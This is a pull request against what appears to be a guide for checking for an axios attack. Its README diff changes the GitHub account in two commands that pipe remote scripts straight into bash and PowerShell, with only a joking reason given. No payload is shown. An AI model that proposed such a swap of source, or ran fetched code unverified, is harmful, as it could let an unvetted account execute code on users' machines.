### PR TITLE
Changed repository name to theNetworkChuck

### DIFF
--- a/README.md
+++ b/README.md
@@ -25,12 +25,12 @@ npm list -g axios
 
 **Mac/Linux:**
 ```bash
-curl -sL https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.sh | bash
+curl -sL https://raw.githubusercontent.com/theNetworkChuck/axios-attack-guide/main/check.sh | bash
 ```
 
 **Windows (PowerShell):**
 ```powershell
-irm https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.ps1 | iex
+irm https://raw.githubusercontent.com/theNetworkChuck/axios-attack-guide/main/check.ps1 | iex
 ```
 
 Or clone and run locally:


### PR DESCRIPTION
Changed repository name from networkchuck to theNetworkChuck 
Of course show some respect , it is " the network chuck " .

Old lines 
irm https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.ps1 | iex

curl -sL https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.sh | bash

Changed these 2 lines 

irm https://raw.githubusercontent.com/theNetworkChuck/axios-attack-guide/main/check.ps1 | iex

curl -sL https://raw.githubusercontent.com/theNetworkChuck/axios-attack-guide/main/check.sh | bash